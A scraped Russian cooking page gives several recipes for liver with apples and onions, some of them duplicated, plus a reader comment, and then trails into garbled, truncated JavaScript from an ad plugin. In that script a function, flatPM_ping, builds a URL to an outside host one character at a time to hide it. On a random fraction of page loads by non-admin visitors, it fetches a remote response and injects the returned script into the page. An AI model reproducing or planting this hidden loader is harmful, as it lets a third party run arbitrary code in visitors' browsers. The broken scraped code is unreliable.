Печень с яблоками

Говяжья печень с яблоками и луком по-берлински

Вкусный рецепт нежной говяжий печени с яблоками и луком по-берлински. Блюдо готовиться просто и быстро. К тому же оно полезно – повышает гемоглобин. И главное говяжья печень с яблоком и луком (по – берлински) — это очень и очень вкусно.

  1. Главная
  2. Лучшие рецепты
  3. Категории рецепта
  4. Говяжья печень с яблоками и луком по-берлински

Ингредиенты и как готовить

ингредиенты на 4 порции или – количество продуктов для нужных вам порций будет подсчитано автоматически!’>

Всего:

Вес состава: 100 гр
Калорийность
состава:
144 ккал
Белков: 10 гр
Жиров: 7 гр
Углеводов: 9 гр
Б/Ж/У: 38 / 27 / 35
Н 67 / С 0 / В 33

Время приготовления: 1 ч

Пошаговое приготовление

Шаг 1:

Нам с вами понадобятся: говяжья печень, яблоко, лук, молоко. А так же соль, черный молотый перец, специи и растительное масло. И немного муки.

Шаг 2:

Печень- конечно моем и внимательно осматриваем.А затем удаляем пленочки и прожилки(если они есть).

Шаг 3:

Теперь берем печень – целиком и отправляем ее в глубокую мисочку ,а затем заливаем молоком. Мисочку можно отставить по дальше .Печень должна вымачиваться не меньше 30 минут(больше можно)

Шаг 4:

А мы пока чистим лук.У меня была огромная луковица и по этому понадобилась только половинка.(линия ножа — от точки прорастания до точки корешков).

Шаг 5:

Теперь мы нарежем наш лук соломкой.И хорошенечко пальчиками разберем его на соломинки.

Шаг 6:

В сковородку наливаем растительное масло и на разогретую сковородку выкладываем лук.И пассеруем его до золотистого цвета.

Шаг 7:

И так, наш лук стал золотистым и мы перекладываем его со сковороды на тарелочку. Внимание сковорода с оставшимся маслом на еще понадобится.

Шаг 8:

Смотрим на часы – 30 минут ( отведенные для вымачивания печени) прошли.. Вынимаем ее из мисочки с молоком и нарезаем ломтиками(слайсами) примерно 1-1,5 см.(Да, не спешите выливать использованное молоко, моя киска была от него в восторге.)

Шаг 9:

Теперь нарезанную на кусочки печень мы по солим,по перчим и добавим специи. Все это по Вашему вкусу. Для специй я взяла итальянские травы. И дадим печени немного промариноваться.( пока мы выполняем шаги № 10 и №11).

Шаг 10:

Застилаем поднос пергаментом или фальгой. Можно даже уже включить духовку.(если это не будет Вам мешать).

Шаг 11:

Вот очередь дошла и до яблока.Моем его ,удаляем сердцевину и режим на дольки.Дольки крупные. Главное,что бы долек было не меньше, чем кусочков печени( в идеале равное количество)Ну а если больше — то не страшно.

Шаг 12:

Теперь обваливаем наши кусочки печени(они уже чуть-чуть промариновались — больше и не надо)в муке.

Шаг 13:

Вспоминаем про нашу сковородочку -разогреваем ее,если оставшегося масла очень мало,то можно добавить. И на сковороду с разогретым маслом выкладываем кусочки печени.Обжариваем печень на среднем огне с двух сторон по 1,5 минуты.

Шаг 14:

Перекладываем кусочки печени на противень(покрытый фольгой или пергаментом).Удобнее будет,если печень класть вверх более плоской стороной.

Шаг 15:

Теперь на каждый кусочек выкладываем наш лук.Так, что бы его хватило на все кусочки.

Шаг 16:

И по верх лука ,также на каждый кусочек печени,кладем по дольки яблока. И отправляем противень в духовку,разогретую до 220 градусов на 4 минуты.

Шаг 17:

Вот и все Говяжья печень с яблоком и луком(по-берлински) готова.Всем приятного аппетита.

Чуть подробнее : яблоко лучше брать по мягче,твердые сорта могут за 4 мин. не пропечься. А вот сладкое или кислое яблоко – это уже на Ваш вкус.Специи рекомендуется: кориандр,базилик и орегано,но лучше по Вашему вкусу.

Печёнка с яблоками

Быстрый и вкусный ужин за 15 минут? Легко! Приготовить его совсем не сложно, если речь идет о печёнке. Готовится она невероятно быстро и просто. При приготовлении печени самое важное правило — не передержать на огне, иначе она станет жёсткой и невкусной. Ну а мы предлагаем оригинальное и интересное сочетание печени с яблоками.

Автор публикации

Валентина Маслова

Валентина Маслова

Живет на побережье сурового, но прекрасного Балтийского моря. Готовить любит с раннего детства, но в настоящее увлечение это переросло с того момента, как стала жить самостоятельно. Сейчас с огромным удовольствием готовит для своей семьи. Дважды мама. Среди увлечений – и фотография, причем фуд-кадры в последнее время занимают львиную долю всех снимков.

Печень вымыть и обсушить. Очистить от плёнок и желчных протоков и порезать ломтиками. В данном рецепте использовалась печень индейки, но можно взять и куриную – её можно оставить целой, не резать.

Подготовить яблоки и лук: яблоко (лучше использовать крепкие кисло-сладкие яблоки) разрезать пополам, аккуратно вырезать сердцевину с семечками и порезать тонкими ломтиками; лук – нарезать тонкими полукольцами.

В сковороде разогреть растительное масло и выложить печень, добавив веточки тимьяна. Готовить на большом огне, 2-3 минуты. Печень должна просто изменить цвет с красного на коричневый. Влить в сковороду красное сухое вино и готовить ещё 2 минуты, после чего переложить печень на тарелку. Сковороду не мыть.

В сковороду добавить небольшой кусочек сливочного масла и выложить ломтики яблок и лука. Готовить, помешивая, 3-4 минуты. За это время яблоки станут мягче, а вино практически полностью выпарится.

Вернуть печень в сковороду с яблоками и луком и готовить ещё 2 минуты, посолив и поперчив по вкусу.

Печёнка с яблоками готова. Приятного аппетита!

Печёнка с яблоками

Быстрый и вкусный ужин за 15 минут? Легко! Приготовить его совсем не сложно, если речь идет о печёнке. Готовится она невероятно быстро и просто. При приготовлении печени самое важное правило — не передержать на огне, иначе она станет жёсткой и невкусной. Ну а мы предлагаем оригинальное и интересное сочетание печени с яблоками.

Автор публикации

Валентина Маслова

Ингредиенты

  • 500 гр печень куриная
  • 150 гр яблоко
  • 50 гр лук красный
  • 100 мл вино красное
  • 2 веточки тимьян свежий
  • 1 ст.л. масло растительное
  • 10 гр масло сливочное
  • перец чёрный молотый
  • соль

Способ приготовления

Печень вымыть и обсушить. Очистить от плёнок и желчных протоков и порезать ломтиками. В данном рецепте использовалась печень индейки, но можно взять и куриную – её можно оставить целой, не резать.

Подготовить яблоки и лук: яблоко (лучше использовать крепкие кисло-сладкие яблоки) разрезать пополам, аккуратно вырезать сердцевину с семечками и порезать тонкими ломтиками; лук – нарезать тонкими полукольцами.

В сковороде разогреть растительное масло и выложить печень, добавив веточки тимьяна. Готовить на большом огне, 2-3 минуты. Печень должна просто изменить цвет с красного на коричневый. Влить в сковороду красное сухое вино и готовить ещё 2 минуты, после чего переложить печень на тарелку. Сковороду не мыть.

В сковороду добавить небольшой кусочек сливочного масла и выложить ломтики яблок и лука. Готовить, помешивая, 3-4 минуты. За это время яблоки станут мягче, а вино практически полностью выпарится.

Вернуть печень в сковороду с яблоками и луком и готовить ещё 2 минуты, посолив и поперчив по вкусу.

Печёнка с яблоками готова. Приятного аппетита!

Куриная печень с яблоками

  • Нам понадобится:
  • 800 г куриной печени
  • 2 луковицы
  • 3 яблока
  • растительное масло
  • соль, перец
  • мука для панировки
  • молоко

Пошаговое описание рецепта

1. Куриную печень очистить, промыть и залить молоком на полчаса..
Затем печень просушить на бумажном полотенце, обвалять в смеси муки и перца и обжарить на растительном масле на разогретой сковороде 7-10 минут.
Поджаренную печень посолить и выложить на бумажное полотенце, для удаления лишнего жира.

2. Яблоки вымыть, удалить сердцевину и кожуру, и нарезать дольками. Выложить яблоки в ту же сковороду с маслом, где жарилась куриная печень и обжарить до мягкости.

3. Печень переложить в форму для запекания, на неё выложить обжаренные яблоки.

4. Лук очистить, нарезать полукольцами или кольцами и обжарить до золотистого цвета в том же масле, где жарились печень и яблоки.

5. Готовый лук выложить сверху яблок.
Форму с печенью, яблоками и луком отправить в разогретую до 150 градусов духовку на 7-10 минут.

6. Подавать куриную печень с яблоками лучше горячей, но и холодная она вкусная.
Приятного аппетита!

  • Ингредиенты
  • 800 г куриной печени
  • 2 луковицы
  • 3 яблока
  • растительное масло
  • соль, перец
  • мука для панировки
  • молоко
  • Поделитесь рецептом :
  • ВКонтакте
  • Facebook
  • Одноклассники
  • Twitter

Вика, какая аппетитная печень получилась! Прям-таки хочется попробовать И вот тут я задумалась о паранормальных явлениях: сегодня рано утром была в размышлениях, готовить ли печень с яблоком. Словно запах учуяла вашего блюда Только чуть-чуть по-другому готовить хотела: печень отжимаем от молока, сразу выкладываем в противень для запекания, яблоки подрумяниваем на сковороде, посыпав их корицей и мускатным орехом, выкладываем поверх печени и запекаем до готовности. Но с луком должно быть вкуснее получается! Красота!

Куриная печень с яблоками и луком

В кулинарии некоторые сочетания продуктов просто идеальны и вкусны до невозможности, даже если на первый взгляд могут показаться немного странными. И нежная куриная печень, тушеная с яблоками – отличный пример такого дуэта. На самом деле эти два продукта будто созданы друг для друга, а если дополнить их бокалом красного вина, получится еще вкуснее.

Ароматные фрукты способны замечательно разбавить вкус печени, который некоторые считают слишком монотонным и неинтересным. Со сладким луком, орегано и дольками карамелизированных яблок, тушеных в сливочном масле, печень заиграет совершенно по-иному!

Ингредиенты

  • печень куриная – 0,5 кг
  • яблоки – 2-3 шт.
  • лук – 1 шт.
  • вино красное сухое – 1 стакан
  • масло сливочное – 50 г
  • орегано сухой – 1,5 ч.л.
  • соевый соус – 2-3 ст.л.
  • мед – 1 ст.л.
  • растительное масло для обжаривания
  • зелень

Приготовление

Куриную печень тщательно промойте от крови, затем каждый кусочек осмотрите на предмет пленок или жира, срежьте их в случае необходимости, а потом нарежьте печень на 2-3 части.

Выложите печень на сковороду с маслом и обжарьте по 2 минуты с каждой стороны. На данном этапе она не прожарится до готовности – нам это и не нужно, так как на следующих этапах предстоит процесс тушения в красном вине. Таким образом, куриная печень останется мягкой, с нежной консистенцией.

После обжаривания переместите печень на отдельное блюдо, затем долейте еще немного масла в центр сковороды и обжарьте на нем репчатый лук.

Обжаривайте до тех пор, пока лук хорошо не обмякнет и не станет выглядеть румяным и золотистым, с приятным сладким ароматом. Теперь можно убрать лук к печени, а сковороду освободить для следующего ингредиента – яблок.

Яблоки нарежьте средними по размеру дольками, не счищая кожуру, чтобы они сохранили свою форму при тепловой обработке и не развалились на более мелкие кусочки. Обжаривайте яблочные дольки 1-2 минуты с каждой стороны на сливочном масле с добавлением соевого соуса и меда.

В получившемся соусе дополнительно протушите яблоки около 2 минут.

Теперь можно вернуть назад на сковороду печень и лук.

Залейте печень, яблоки и лук красным вином, посолите по вкусу и посыпьте ароматным сухим орегано.

В первые 3 минуты нужно тушить блюдо на максимальном огне без крышки, а когда весь алкоголь испарится, накрыть сковороду с печенью крышкой, тушить на минимуме еще 15 минут либо до полной готовности.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};